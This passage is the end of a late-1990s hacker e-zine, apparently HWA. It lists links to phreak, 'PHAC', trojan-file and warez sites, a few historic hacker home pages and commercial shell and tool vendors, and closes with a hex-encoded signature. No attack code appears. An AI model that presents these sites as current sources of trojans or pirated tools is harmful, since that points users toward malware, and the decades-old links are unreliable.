  1431.     http://www.cen.uiuc.edu/~ejk/browser-security.html ... Security
  1432.     http://www.hackcanada.com/ ..........Canadian phreak site
  1433.     http://www.ufl.edu/~cycy92n/........ PHAC site - trojan files
  1434.     http://www.cyberarmy.com/search/  .. PHACV search engine
  1435.     http://www.phorce.net/ ............. IRC War and takeover news etc
  1436.     http://www.legion2000.org/hcvorg/ .. Trojans and PHAC
  1437.     http://www.born2hack.com/ .......... PHAC Site
  1438.     http://www.hellsroot.org/ .......... PHAC Site
  1439.     http://www.deltasitez.nu/index.html .PHAC Site
  1440.     http://www.theargon.com/.............PHAC Site
  1441.  
  1442.     Historic:
  1443.     ~~~~~~~~
  1444.     http://www.savage.net/ Annaliza Savage's home page
  1445.     http://www.kevinpoulsen.com/ Kevin Poulsen's home page
  1446.     http://catalog.com/kevin/ KP's mirror site (aka The Switch Room)
  1447.     http://home.pacbell.net/sysadm/ Agent Steal's home page
  1448.  
  1449.  
  1450.     Commercial:
  1451.     ~~~~~~~~~~~
  1452.     http://lockdown2000.com/demo/start.html .. "Hacker demo" (protection software)
  1453.     http://www.calgate.net/shellorder.html  ... $50/yr shells(!)
  1454.     http://www.hackershomepage.com/ ........... Hacker $tuff, Toolz/Warez
  1455.  
  1456.     @HWA C*:.98
  1457.  
  1458.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  1459.      --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  1460.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  1461.        [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]